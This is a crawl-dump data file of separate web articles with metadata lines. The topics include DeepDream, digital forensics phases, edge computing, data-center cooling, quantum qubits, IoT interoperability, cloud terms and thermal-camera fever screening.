Common sense cybersecurity practices and training are the first line of defense. Cyber insurance is the final piece. Visit us online or give us a call at (800) 590-7292 to learn how cyber insurance can protect your business. | <urn:uuid:6a2c44c8-3aee-434e-9f80-83cd0361d805> | CC-MAIN-2022-40 | https://www.cyberpolicy.com/cybersecurity-education/the-importance-of-individuals-owning-their-role-in-cybersecurity | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00387.warc.gz | en | 0.938584 | 897 | 2.515625 | 3 |
A small group of Google software engineers have open sourced a new tool that can take an image and create an artistic spin on it using deep neural networks.
The sample code, which comes in an IPython Notebook, is based on Caffe, which is a deep learning framework developed by the Berkeley Vision and Learning Center. Deep learning is artificial neural networks that are made up of many hidden layers between the input and output.
To use the tool, people will also need to set up NumPy, SciPy, PIL, IPython, or a scientific python distribution such as Anaconda or Canopy.
The tool constructs an image it is given layer by layer, starting out with a basic outline and then adding more detail as it moves through the deep layers of the neural network. In that process, users can decide which layer they want to enhance, how many iterations they want to apply on its own outputs, and how far they want to zoom in after each iteration to create their own remix of the original image.
The Google software engineers open sourced their tool for research purposes and to see what kind of art others could produce using it. They are encouraging people to post their art to Google+, Facebook, or Twitter with the hashtag #deepdream.
The software engineers can be contacted:
Alexander Mordvintsev, email@example.com
Michael Tyka, firstname.lastname@example.org
Christopher Olah, email@example.com | <urn:uuid:57b66d32-d5c9-483c-b963-16438c8a890b> | CC-MAIN-2022-40 | https://www.cio.com/article/202089/google-open-sources-neural-network-art-tool-deepdream.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00387.warc.gz | en | 0.937344 | 299 | 3.09375 | 3 |
EDR / MDRIdentify, contain, respond, and stop malicious activity on endpoints
SIEMCentralize threat visibility and analysis, backed by cutting-edge threat intelligence
Risk Assessment & Dark Web MonitoringIdentify and quantify unknown cyber risks and vulnerabilities
Cloud App SecurityMonitor and manage security risk for SaaS apps
SOC ServicesProvide 24/7 threat monitoring and response backed by ConnectWise SOC experts
Policy ManagementCreate, deploy, and manage client security policies and profiles
Incident Response ServiceOn-tap cyber experts to address critical security incidents
Cybersecurity GlossaryGuide to the most common, important terms in the industry
Digital forensics: what is it and how does it work?
Modern society gives birth to modern crimes. Unfortunately, that means criminals and threat actors of the day are attempting to harm users as they browse blogs, shop online, and scroll social media on their smartphones. As a result, digital forensics is becoming a growing, necessary part of how our world works.
But what is digital forensics? How does it work? Discover the answers to these two questions and more by diving into the article below.
What is digital forensics?
Digital forensics – or computer forensics – is the science of manipulating and analyzing digital data to be used as evidence in a court of law.
This data can come from any number of electronic sources, including a laptop, computer, smartphone, server, or data network. Professionals in this field cooperate with a larger forensics team to aid in navigating, inspecting, and analyzing these data sources in a larger criminal investigation.
What are the branches of digital forensics?
There are five different branches to consider within the broader field of digital forensics. Although digital forensics is sometimes called cyber forensics, the process doesn’t solely deal with computers.
The five main branches of this important criminal science are:
- Database Forensics – focusing on databases and associated metadata, database forensics handles multiple aspects of data. Investigators may analyze transactions within a database, or review timestamps to verify a particular timeline of user interactions.
- Computer Forensics – solely focuses on evidence found on computers and in digital storage media. This branch combines traditional data recovery measures with proper legal procedures to support both criminal and civil cases.
- Network Forensics – this is the most fast-paced branch of digital forensics. Once data has been transmitted across a network, it’s gone. As a result, network forensic investigations tend to be more proactive than reactive.
- Mobile Device Forensics – the increased use and intricate nature of mobile devices has increased demand for professionals in this branch. This style of forensics involves navigating complex technologies like GPS and hibernation in any device with internal memory and communication platforms, not just smartphones.
- Forensic Data Analysis – investigators primarily focus on the analysis of structured data regarding financial institutions. The goal is to discover patterns, trends, or spot fraudulent activity by applying keyword searches or data mapping techniques.
Initially, digital forensics was done by skilled IT system administrators with general computer science knowledge, certifications, and training. But, as the need for cybersecurity and digital forensics grew, and digital crimes became more complex, these five cyber forensics specifications became necessary.
How does digital forensics work?
The science of digital forensics relies on the concept of our digital footprint. Unknown to us, every move we make on the internet leaves a trace.
Every time you visit a website, shop online, or send a tweet, a “paper trail” develops. Essentially, we all have digital records of our internet activity out there on the world wide web. Professionals in the field of computer forensics can take that data, analyze it, and produce solid evidence for criminal or civil cases being tried in a court of law.
A cyber investigator may be asked to recover deleted files, restore a damaged hard drive, crack encrypted passwords, discover the source of a security breach, and more. To perform these tasks effectively, some of the tools used can be complex. Packet scrapers, analysis tools across multiple devices and communication platforms, data capture tools, and file viewers are just some of the tools digital forensics investigators have at their disposal.
What are the phases of digital forensics?
Taking digital data in its raw form and turning it into viable evidence to be used by law enforcement can be complex. Generally, the overall process usually follows four distinct phases.
The cyber investigation process starts with taking possession of the device in question. enforcement officials obtain a warrant and then physically take possession of the device holding the digital evidence. Law enforcement’s involvement is a crucial part of this step as it maintains the appropriate chain of custody with regard to evidence.
Once the raw data is physically in possession of law enforcement, cyber investigators work to duplicate files pertaining to the case. This is done using a hard drive duplicator or software imaging tool. Once the copy of the data is created, the original drive is stored safely and securely. At the same time, the digital evidence goes through several stages of validation to make sure it’s still in its original state.
At this point in the process, cyber investigators will review the files copied from the original hard drive to see if they support or refute the charges brought against the accused. The investigator will call on various skills to analyze this data and get a complete picture of what actually happened during the events in question. Typically, this requires recovering deleted files, reviewing documents and internet history, chat logs, email, and may even require investigators to dig into the computer’s operating system cache.
Once this data is mined and collected, it’s then translated and made presentable for court. It would be hard for police or attorneys to use in its raw form, so part of a cyber investigator’s job is to make this digital evidence relatable and understandable to non-IT members of the court system. From there, it’s examined further and hopefully will help prosecutors and law enforcement bring the alleged crime to a speedy resolution.
This step is a crucial part of what cyber forensics is. Without it, all of the effort seizing, acquiring, and analyzing the raw data would be wasted.
Why is digital forensics important?
The data recovery measures that are possible via computer forensics can play a crucial role in helping to bring threat actors to justice.
Often, hackers will attempt to destroy data or “cover their tracks” after committing a cybercrime or data breach. Destroying data may even be the technique they choose to harm their targets.
The efforts of cyber investigators can be instrumental in recovering or repairing the data involved in a cybersecurity event. Not only can these professionals repair or recover the data in question, but they can also identify any data that’s been removed from the system by cybercriminals. Considering how important and sensitive data has become in our modern world, digital forensics is an essential line of defense.
How can MSPs implement digital forensics for their clients?
As an MSP, your primary function is protecting your clients’ data. However, no one is perfect. Despite the lengths you may go to in protecting your clients’ network, cyberattacks are inevitable.
Digital forensics can be a valuable tool in helping MSPs strengthen their clients’ networks. The recovered or analyzed data can help you discover weaknesses in an organization’s cybersecurity protocols and take the steps necessary to strengthen them. Security information and event management (SIEM) tools are often a part of these protocols.
In the event of a cyber-attack, MSPs are also on the front lines. As the party responsible for their clients’ cybersecurity management, it falls on them to act quickly and immediately salvage any digital evidence. Doing so and managing the aftermath is the most critical part of any cybercrime investigation, whether this applies to email, ransomware, or other attacks.
What role does digital forensics play in cybersecurity?
Digital forensics and cybersecurity often overlap as digital forensics plays an important role in your threat response. It can’t be used to prevent an attack from happening, but it’s an important part of recovering afterward.
When an attack does happen to penetrate an organization’s cybersecurity measures, the information you learn from your digital forensics efforts can also be studied to prevent future attacks.
You’ll also be able to offer your clients the utmost protection by leveraging digital forensics to see if there is still suspicious activity within the system. From there, you can suggest steps your clients can take to neutralize these threats and reduce dwell time in the future.
Follow the footprint
Using digital forensics effectively is all about following the digital footprint. MSPs play an important role in what computer forensics is since they are the first line of defense for data protection. Organizations should take the time to make sure their MSP is an expert in the field and can provide the quick response necessary to save data and, ultimately, bring hackers to justice.
Are you ready to help your clients enhance their cybersecurity and stop threat actors in their tracks? Contact ConnectWise today for more information and to see the cutting-edge tools we have to offer. | <urn:uuid:52222ed3-63b9-4c32-a06f-b18a43c66468> | CC-MAIN-2022-40 | https://www.connectwise.com/cybersecurity-center/glossary/digital-forensics | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00387.warc.gz | en | 0.91939 | 1,936 | 3.15625 | 3 |
Multi-access edge computing (MEC), known by many by its previous name, mobile edge computing, is a network architecture that gives network operators and service providers cloud computing capabilities as well as an IT service environment at the network edge. The concept of MEC has grown increasingly popular over the past few years, with the curiosity of many interested parties snowballing alongside the expansion of the Internet of Things (IoT). In this three-part series of articles on MEC, we’ll look at how multi-access edge computing works, the security challenges it faces and how it can be protected and secured, and how it will be used to improve the networks and services of tomorrow.
Multi-access edge computing is currently one of the most popular topics for discussion when it comes to the technologies that will enable network operators and service providers to realize the potential of both enhanced network architectures and the Internet of Things.
Having had its name changed from mobile edge computing to multi-access edge computing by the European Telecommunications Standards Institute (ETSI) to allow for a more heterogeneous approach to be adopted, multi-access edge computing has now opened its avenues up beyond mobile and into Wi-Fi and other access technologies.
In this, the first of three articles looking at multi-access edge computing, we’ll be taking a look at how MEC has come about and how it works as well as taking a look at some examples of how it is being used today. So, let’s start with why MEC?
Why Multi-Access Edge Computing?
While initially showing great promise in mobile technologies, edge computing has since gone on to demonstrate how it could also be applied to other access technologies such as Wi-Fi with at least similar, if not greater levels of success.
For example, much of the data created by IoT and smart devices needs to be collected and responded to in a close to real-time. Data generating processes such as network services, connected manufacturing equipment, automated critical infrastructure, or automated vehicles could all have significant impacts on network operators and service providers, manufacturing and utility operations and even people’s lives if data processing delays impede their ability to function appropriately.
In order to combat network latency and enable enhanced performance and next-gen network services and functions, operators and service providers are looking to multi-access edge computing to transform the current landscape.
The logic behind MEC is simple enough. The further away from the source data processing, analysis and storage takes place, the higher the levels of latency experienced.
By processing, analyzing and storing the data generated at the very edge of the network, operators and providers can deliver enhanced response times and improved services while also laying the groundwork for more advanced concepts such as driverless vehicles and enhanced automation.
The Benefits of MEC
The benefits of multi-access edge computing can be found in various places and applications. The most obvious are the way in which it allows network operators and service providers to reduce latency in the services in order to enhance overall customer experiences alongside the ability to introduce new, high-bandwidth services without the previously mentioned latency issues.
Both of these are great ways to apply MEC in order to enhance businesses and industrial operations, however, there are other benefits to multi-access edge computing, too.
Security is also one of the advantages of multi-access edge computing as many MEC systems will utilize local, private connections to ensure data security. As well as security, multi-access edge computing systems can also be integrated in any wireless network infrastructure including wireless, cellular, or a combination of the two.
The increased availability of IT resources and applications alongside the ability to run higher-bandwidth network process looks set to further increase technological innovations in the field and help produce the MEC networks of the future.
Emerging technologies such as autonomous vehicles will rely on real-time data analytics in order to function safely, something that multi-access edge computing, it is suspected, will help to enable.
While MEC is still in its infancy, there are several use cases we can draw upon to further improve our understanding our how multi-access edge computing works in real-world scenarios. The following three use cases showcase how network operators and service providers hope MEC architectures will be used in the future.
In industrial use cases, the distributed cloud environment that multi-access edge computing is able to provide would become invaluable for the various applications it then enabled. In the case of critical infrastructure, real-time data analytics could potentially stave off malfunctions and unnecessary repairs by informing engineers of any anomalies as they occur.
Much like its industrial use cases, MEC brings many of the same benefits to enterprise environments. Security and surveillance, for example, could be greatly enhanced if data was processed, stored and analysed closer to the source, improving overall security. The same is true for behavioral analytics of customers in the retail industry, for example.
In the entertainment industry, multi-access edge computing could be utilized to provide even greater customer experiences as is happening in areas such as stadium and venue sports, events and performances. Multi-player or action cams and other such services could be provided without the typically associated bandwidth and latency issues that have plagued these ideas for so long.
In part two of this three-part series on MEC, we’ll be taking a look at the security challenges faced by multi-access edge computing and trying to understand how best MEC might potentially be protected from them. | <urn:uuid:a9347dc7-9046-42b7-8e67-6a01b117c860> | CC-MAIN-2022-40 | https://www.lanner-america.com/blog/multi-access-edge-computing-part-1-multi-access-edge-computing-work/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00387.warc.gz | en | 0.943193 | 1,127 | 3.140625 | 3 |
Imagine a microwave that doesn’t warm your food, but scans it instead and instantly reveals how many calories it has. Thanks to General Electric, who are currently working on a machine that does exactly that, this technology will soon be a reality. This new microwave’s concept design can be found all over the web, but the final name and look is yet to be revealed.
How does it work?
Despite being called a microwave, this new version works in a completely different way than what we’re used to. It doesn’t cook the food, for one. Instead, it uses low energy microwaves to “scan” the food to determine its caloric content. The machine does this by measuring three main components: the weight, fat content, and water content.
At this stage of product development, it only works on purees, liquids and blended food. The technology is still being developed to eventually work on solid food.
Calorie counting made easy
When it comes to losing weight, one of the key rules to follow is to aim for a calorie deficit. This means cutting back on calories consumed and spending more calories through exercise. This new technology opens up opportunities for people to easily track the calories in the food they eat, helping them make better choices and paving the way towards better eating habits.
GE’s new microwave holds a great deal of promise since traditional calorie-counting methods involve a lot of research and keeping track of everything is tedious and time consuming. With this machine, all that hassle can be eliminated since it’ll get the job done in just a couple of seconds.
This is exciting stuff and definitely something to look forward to. GE’s research and development team led by biologist Matt Webster says that the finished product will probably be available to consumers in a couple of years or so. | <urn:uuid:4bbe3093-c1a9-44a0-b515-c56b1530262b> | CC-MAIN-2022-40 | https://davidpapp.com/2014/08/15/microwave-that-counts-calories/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00587.warc.gz | en | 0.957566 | 379 | 3.1875 | 3 |
Why can't servers run in the desert with no air conditioning? And why can't data center managers automatically ramp processor power usage up and down to match their workloads? Those questions were debated by some of the world's leading data center experts Wednesday at the Technology Convergence Conference in Santa Clara, Calif. The surprising answer: some of these scenarios are closer to reality than you think.
Take the data center in the desert. Subodh Bapat, the former VP of Energy Efficiency at Sun Microsystems, shared an anecdote about a data center user in the Middle East that wanted to test server failure rates if it operated its data center at 45 degrees Celsius - that's 115 degrees Fahrenheit.
Testing projected an annual equipment failure rate of 2.45 percent at 25 degrees C (77 degrees F), and then an increase of 0.36 percent for every additional degree. Thus, 45C would likely result in annual failure rate of 11.45 percent. “Even if they replaced 11 percent of their servers each year, they would save so much on air conditioning that they decided to go ahead with the project," said Bapat. "They’ll go up to 45C using full air economization in the Middle East.”
eBay: Free Cooling in Phoenix
One of the largest Internet e-commerce operations is pursuing a similar strategy in the U.S. eBay will use fresh air cooling in its new modular data center in Phoenix, where the average temperature exceeds 100 degrees in the summer. Dean Nelson, Senior Director of Global Data Center Services at eBay, says the servers can handle it if the facility is designed correctly.
“The reality is that the manufacturers baby the servers," said Nelson. "That’s the truth."
Raising the baseline temperature inside the data center can save energy used to operate chillers (air conditioning systems) by enabling more extensive use of “free cooling,” the use of fresh air from outside the data center. Free cooling is typically implemented in cool climates, but eBay isn't alone in hoping to extend the areas where it can be implemented.
"If we can get the manufacturers to design for higher temperatures, you could operate IT equipment anywhere without a chiller,” said Bill Tschudi, progam manager at Lawrence Berkeley National Labs.
More Granular Server Management
But nudging the thermostat higher is only appropriate for companies with a strong understanding of the cooling conditions in their facility. Just about all of the panelists at the Technology Convergence Conference were eager for more tools to provide granular management of server performance and power usage.
Nelson noted recent research from Data Center Pulse that identified potentially significant power savings from dynamically adjusting the clock speed of CPU processors to match IT workloads. The group's testing suggests that overclocking and underclocking processors as workloads fluctuate can reduce a server’s energy use by as much as 18 percent.
"There are huge potential reductions (in energy usage) available," Nelson said. "Why can’t we have control over that chip? Why can’t we have the controls to give us a gas pedal, so that we can throttle up and throttle back?"
“You should be able to scale down your energy use," agreed Mukesh Khattar, Energy Director at Oracle Corp. "That will give you more savings than anything else. If your servers are doing zero percent work, they should be using zero percent power. But they’re not. (Power usage at idle) is closer to 80 percent."
The Processor Perspective
It's possible to tweak servers to match processor function to workloads, as Data CenterPulse proved in its testing. "There’s lots of knobs inside a server design you can tweak to enhance its performance and manage its power," said Bapat.
The processor perspective was shared by Henry Wong, Senior Staff Technologist at Intel, who was sympathetic to data center executives' yearnings for advanced power management tools. But that doesn't mean it's a simple problem to solve.
"Having many knobs makes it really difficult for IT managers," said Wong. "To provide this level of control, you’ve got to automate it.”
Wong favors an approach that uses policies that can be translated into granular server settings. “That’s one of the technologies we’re trying to build in," said Wong. "To get to that nirvana requires a lot of effort. And no one policy is going to fit everyone. We’re trying to build in these heuristics and artificial intelligence. But it’s still a few years away." | <urn:uuid:3f24d7e4-b7cf-477d-be62-ededf6f74d5f> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/archives/2011/02/25/whats-next-hotter-servers-with-gas-pedals/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00587.warc.gz | en | 0.94953 | 964 | 2.625 | 3 |
Australian Researchers Harnessing Spin-Orbit Coupling: Scaling Up Quantum Computation
(Phys.org) A team of Australian scientists led by Professor Sven Rogge at the Centre for Quantum Computation and Communication Technology (CQC2T) have investigated the spin-orbit coupling of a boron atom in silicon. Spin-orbit coupling, the coupling of the qubits’ orbital and spin degree of freedom, allows the manipulation of the qubit via electric, rather than magnetic-fields. “Single boron atoms in silicon are a relatively unexplored quantum system, but our research has shown that spin-orbit coupling provides many advantages for scaling up to a large number of qubits in quantum computing” says Professor Rogge, Program Manager CQC2T.
The utilization of the spin-orbit coupling of atom qubits have adding a new suite of tools to the quantum armory. Using the electric dipole coupling between qubits means they can be placed further apart, thereby providing flexibility in the chip fabrication process in the future. “Boron atoms in silicon couple efficiently to electric fields, enabling rapid qubit manipulation and qubit coupling over large distances. The electrical interaction also allows coupling to other quantum systems, opening up the prospects of hybrid quantum systems,” says Rogge. | <urn:uuid:bf64fc4b-5447-4581-b40c-5951cfaa6881> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/australian-researchers-harnessing-spin-orbit-coupling-scaling-quantum-computation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00587.warc.gz | en | 0.844278 | 270 | 2.90625 | 3 |
Industry 4.0 has ushered in new important technologies such as wearables and the Internet of Things (IoT), and they are already transforming business as usual by increasingly allowing for the automatic control of everything – from construction to production to logistics. Connected devices are just about everywhere, and beyond business, they are transforming our lives.
The number of interconnected digital and electronic devices in operation globally is nearly twice the number of people on the planet – 13 billion devices. From vending machines, factories and logistics to smart cars, smart homes and smart cities, the devices are talking to each other. Now more than ever manufacturers need to take measures to ensure that sufficient interoperability, privacy and security is in place to find continued consumer acceptance, and pre-market testing can help.
Internet of Things (IoT) is a megatrend that manufacturers cannot afford to ignore. It is expected that IoT will connect as many as 28 billion devices by 2020, from wearables to smart home devices to connected cars. Interoperability plays an important role to help IoT reach its full market potential. IoT devices rely on various protocols to “talk to” each other and the internet.
To many, interoperability is just a “check the box” item on an organisations to do list. What they don’t realise is that interoperability has the potential to unlock more than $4 trillion (opens in new tab) from IoT usage by 2025. According to PWC’s Connected Home 2.0 Report (opens in new tab), households will spend approximately £10.8bn on smart devices in 2019, and interoperability will be key to this adoption.
Though interoperability is invisible to the consumer, it is essential that manufacturers ensure their IoT device can communicate seamlessly. Consumers want products that are simple to use, reliable and compatible with their existing high-functioning electronic devices. If a gadget can’t receive and process information and act upon that information, the product won’t work as consumers expect it to. Unintended interaction between any electronics and emissions from the equipment can have adverse impact on other electronic devices or radio systems – and without full functionality, the product may not provide value.
In 2017, TechUK’s State of the Connected Home Report (opens in new tab) found that 16 per cent of people are apprehensive about the ability of technology to communicate across different systems. The expectations for connecting products to smart homes, smart cars and smart cities are high. Consumers request out-of-the-box functionality - wanting interoperability - which encompasses multiple devices and settings, with little or no extra configurations. This introduces both technical and communication challenges for the industry around what devices operate in which ecosystem. Helping to ensure cross-protocol communication and maintaining connectivity strength and secure connections is key to safer and more secure products.
Privacy and safety
For now, interoperability issues among smart devices have largely been contained to performance. However, what happens when communication discrepancies bleed into privacy and safety — like having a security camera hacked, or having a broken smoke alarm? PWC’s Report also shows that privacy concerns represent a significant barrier to adoption for 22 per cent of consumers who do not already own smart technology. This is particularly true for data, as consumers are becoming more aware of the power of data, the security of data and how that data is used. Having established standard operating frameworks in place will help address the issue of interoperability and aid continuous data sharing amongst devices, stakeholders and locations.
Despite significant consumer scepticism to smart device security, artificial intelligence is giving us new means of combating cyber threats by outwitting them. The security of connected consumer devices is not just a matter of interest to the customers who use these devices, it is increasingly becoming a matter of national interest. Malware that can take control of, and subvert the operation of, connected systems has been used to launch some of the largest attacks on the Internet that have ever been seen. The connected nature of these systems also means security must be considered for any ‘apps’ that run on separate systems (such as the consumer’s phone), as well as ‘cloud’ services.
With more and more products needing wireless capability to compete in a rapidly changing market place, there is a need to make sure products function both safely and flawlessly in real-world environments. Without external support, it can be difficult to predict what sources of error, interference and, thus, dissatisfaction may appear when a device gets into the hands of real users. Whatever the innovation, whatever the product, it cannot succeed if it is not safe. This is why pre-market testing is so important to helping ensure product safety.
For manufacturers, the future potential is clear and present, but great opportunity is sometimes accompanied by great risk. To address the challenges within interoperability, privacy and safety, proper testing is important to help organisations avoid the unfortunate consequences of overlooked details.
Across connected devices, companies should not only test all electromagnetic compatibility (EMC) and wireless requirements to make sure devices are properly communicating during normal operating conditions, but also look at what happens when the Wi-Fi goes down, when there is a low internet signal, when the power goes out, and all possible scenarios which may affect connected devices.
Manufacturers need to be ready to understand market demands, keep up with the latest technology and innovations and be certain their products are ready for the market. Smart cars, smart homes and smart cities are ripe for innovation, but successful innovation is more than having a clever idea. It means being able to transform that idea into a product that meets a perceived need at a particular time, is safe for consumers and works well.
As such, interoperability provides the opportunity for major and rapid growth. Testing can not only save significant resources in the long term, but also help to create better product reviews, loyal customers and increased sales. Whatever the industry, that trust is a fragile thing. Consumers must believe in a brand, and a product. They must believe that performance will occur as promised. And safety is ensured. Trust in product and company safety, security, quality and sustainability, is vital.
Phil Davies, EMEA-LA general manager, UL (opens in new tab)
Photo Credit: bergserg/ Shutterstock | <urn:uuid:6339f1c5-a899-4881-8154-5d09af57b3b9> | CC-MAIN-2022-40 | https://www.itproportal.com/features/the-state-of-the-connected-world-and-the-challenges-that-go-with-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00587.warc.gz | en | 0.948916 | 1,297 | 2.6875 | 3 |
I borrowed the term opportunity costs from economics. Opportunity costs occur whenever there is a tradeoff between two options. For example, either one of two things can be done, A or B. If you decide for A, then the benefits of B cannot be realized. These lost benefits of B are the opportunity costs of choosing A.
Such decisions have to be made constantly in the development process. Let’s imagine that we have a data science problem to solve. Should we use Python or Java as a programming language? With Python, our developers would be five times faster for this particular problem, but we do not have Python programmers in the team. Do we hire some? Train the existing staff? Offer training on the job? Or do we go for Java after all, despite the downsides?
Another example: Should we use a software library or write the code ourselves? A software library brings a lot of functionality, but we must learn how to use it and adapt our code to it. Writing the code ourselves harbors the risk that more requirements might come in later and, in the end, we would have recreated the complete library.
There are tons of these decisions in every project – and there’s more.
Opportunity costs of communication
I am sure everybody has noticed that when a software project starts, a first working prototype is built in days or weeks, yet the complete product takes months or even years. This is due to the additional requirements in an enterprise-grade tool, summarized in the Pareto principle: It takes 80 percent of the costs to implement the last 20 percent of the product.
But there is another effect in motion: The costs of communication. A programmer can code for eight hours a day. Ideally, they must remain focused for that time. But what does a normal day really look like? A half-hour Scrum meeting at 9am. After, the developer has scarcely enough time to start thinking about the problem at hand before being interrupted at 10am by a meeting about an architecture detail that will impact everybody. From 11am onward, they start thinking about the problem again, write a few lines of code – at 12pm, it’s lunch time. Day in and day out the entire development process is interrupted, and eight-hour days are essentially reduced to one to two hours of actual work. Communication does have huge opportunity costs.
Yet, no communication at all also creates opportunity costs. We all have seen projects fail where each individual member made good progress, but at the end no product came out of it. I was really shocked about what kind of development speed I was able to achieve in my own company compared to when I was an employee. A factor of about five times faster.
Risks are opportunity costs
Another mistake I often see is forgetting to evaluate the inherent risks of choosing option A or B. Using my above example of Python versus Java, training the team to use Python involves risks. After the training, the developers will be junior developers for Python, regardless of their experience in Java. The risk of creating sub-optimal code is huge, plus the development speed will be lower. Both are due to the lack of experience in Python.
Will the developers love Python and be highly motivated? Nobody knows in advance. Did we falsely assume the product can be built in Python more efficiently, simply because there had been no prior experience with Python and the downsides it has in other areas? Hard to tell. If we choose Java, the risk is low. We know what lies ahead of us, we are certain about the development time it will take. Is the risk of choosing Python worth it?
When making such decisions, the list of pros and cons should always have a probability attached to it. How long does it take to build in Python? One week. In Java? Two months. How certain is the team this statement is true? 50 percent.
What happens quite often in projects is that the team reaches no fact-based decision. If the advantages and disadvantages of choosing A or B were indisputable, the question would not even come up. The problems of picking one option lie either in different estimations of costs, risks, and side effects or in long-term versus short-term impact.
We must resolve that somehow. Listing the pros and cons for both options takes a day, usually accomplishing nothing of substance. So, we try diving in one level deeper to figure out why people have different point of views. Maybe lack of knowledge on one side or the other? Different assumptions or understandings? Another five days spent dealing with those questions. As this seems to be a fifty/fifty decision, maybe adding product management’s thoughts about the long-term perspective will bring the team towards a decision? This only serves to involve more people that have to be aligned in the end, which makes reaching a decision even harder. In this case, the smarter move would be to make an arbitrary decision and just start working instead of agonizing over the decision and accomplishing nothing. Just imagine: A lion is chasing us, should we take the left or right path? Someone says, “Follow me, we’ll take the left one!” Would you really question the decision and wait around to be eaten? Realizing the potential this approach has takes guts on the development manager’s side.
Unfortunately, no matter what you choose, people will find something to criticize. If you go with Python in the above example, after the project is finished, some people will inevitably say that they were right all along: With Python, it was harder to implement enterprise-grade software, the code was rewritten multiple times because of lack of experience, and with Java, none of that would have happened. Had the decision been Java instead, other people would have pointed out that the same code could have been written in Python within days instead of weeks due to the powerful data science libraries.
There is no definitive proof if the decision you didn’t make truly would have been the better one. That is why assigning a probability factor to statements often helps.
What is the solution to all the problems I laid out? Drum roll, please: There is none. Every project is different. People are different.
Scrum (agile development), if used properly, is a wonderful tool for software development. The rest is leading the team by example and being aware of the pitfalls. Most important, however, is a small team size for each individual component that has to be built. | <urn:uuid:d2453f8c-cbdb-46fa-93b4-60c682ada147> | CC-MAIN-2022-40 | https://e3zine.com/opportunity-costs-in-software-development/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00587.warc.gz | en | 0.962388 | 1,340 | 2.84375 | 3 |
Cloud computing has become an integral part of many organizations. But what do the solution architects, software developers and business users need to understand about this technical topic?
This article aims to provide you a better understanding of some important enterprise cloud computing application terms.
Cloud computing application (cloud app)
A cloud app is a program that is hosted in the cloud, possessing characteristics of both desktop and web applications. Most cloud apps can be easily accessed since it works online and offline. It can also be updated anytime, anywhere.
Cloud Application Performance Management
Cloud APM or CAPM upholds the application’s performance running in hybrid and private cloud environments. Acting as the champion for organizations that are using cloud applications, CAPM monitors and manages the applications and the resources they are running on to make sure everything work properly.
CAPM tools help the organizations identify a poor user experience and quickly resolve any issues. Some tools even have the capability to alert IT administrators where a problem may potentially arise, or the ability to automate a solution for an ongoing issue.
Virtual Private Cloud
A virtual private cloud is a private cloud existing in a service provider’s public cloud environment. It has the capability to securely transfer data between a private enterprise and a public cloud service provider. This task is made possible through strict application of security policies such as tunneling, encryption, private IP address, and allocation of a unique VLAN to each customer.
Application migration refers to the process when an application is transferred from one environment to another. The migration is either from on-premise server to the cloud or from one cloud to another cloud environment.
Migrating applications can be a daunting task because hosting platforms have their own unique characteristics. Some factors that can affect the migration include the different architecture, management tools, operating systems, and storage system in the environment where the applications were deployed. In addition, not all apps were designed to be portable.
Cloud Application Management for Platforms
CAMP plays an important role in improving cloud’s interoperability as well as simplifying the management of its apps. Its primary objective is to define the program interfaces and the items offered by platform as a service (PaaS) cloud provider.
The CAMP specification is submitted to the Organization for the Advancement of Structured Information Standards (OASIS). The group creates a standard program interface that makes it easier for many enterprises to work in several cloud environments.
Need help with your cloud computing infrastructure, database as a service (DaaS), software as a service (SaaS) or Oracle Cloud Database? Contact Four Cornerstone now! We have a team of experts who can help you leverage your cloud computing and Oracle investments. We also offer Oracle and Oracle MySQL consultation services, Oracle Linux and OVM support, and Oracle software licensing and hardware resell. Our extended solutions include the ones for Fusion Middleware and enterprise business intelligence. You can reach us by going to our online contact page or calling us at 817-377-1144.
Photo by Quinn Dombrowski. | <urn:uuid:27cf567a-aecd-498b-9194-42e775731f2d> | CC-MAIN-2022-40 | https://fourcornerstone.com/understanding-cloud-computing-application-jargon/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00587.warc.gz | en | 0.929948 | 626 | 2.8125 | 3 |
What are thermal cameras?
A thermal camera is a camera that creates images using infrared radiation instead of visible light. The capture and analysis of the data they provide is called thermography.
Can all thermal cameras be used to calculate temperature?
No. To measure temperature, a thermal camera must also support radiometry. Thermal cameras that do not support radiometry can only detect temperature changes.
Can a thermal radiometric camera identify COVID-19 cases?
No. At best, it can identify humans whose surface (or skin) temperature is higher than a certain threshold. Although an elevated surface temperature might indicate the presence of a fever, further medical testing is required to confirm an elevated body temperature. Because surface temperature fluctuates more readily than body temperature and is susceptible to change based on a person’s surroundings, it is not an accurate indication of a person’s core temperature. In addition, to measure surface temperature accurately, the camera needs to be correctly calibrated before initial use, and then re-calibrated daily.
In the USA, devices used for such use cases need to be cleared by the FDA to be legally marketed. Thermal cameras could be used to triage people that would then require further analysis. Claiming otherwise could be deemed illegal.
Which thermal cameras are approved by the FDA?
Currently, only the following devices are cleared by the FDA. This includes FLIR devices that belong to their Instruments portfolio and lack the proper interfaces to be integrated with Security Center.
Some manufacturers are making aggressive claims about their equipment's capabilities. How do I distinguish fact from fiction?
We have seen a lot of unrealistic marketing material lately and this is a concern for Genetec Inc.
Beware of companies that claim that their equipment can detect fever, or that they can function properly outdoors or in a crowded environment. Accurate measurements require controlled ambient conditions and a controlled flow of people passing in front of the camera while looking at it. In any case, Security Center is an open platform and we are always looking to work with reputable manufacturers.
What camera manufacturers and models can currently be used to do a triage within Security Center?
There are currently two camera manufacturers: Mobotix and Axis.
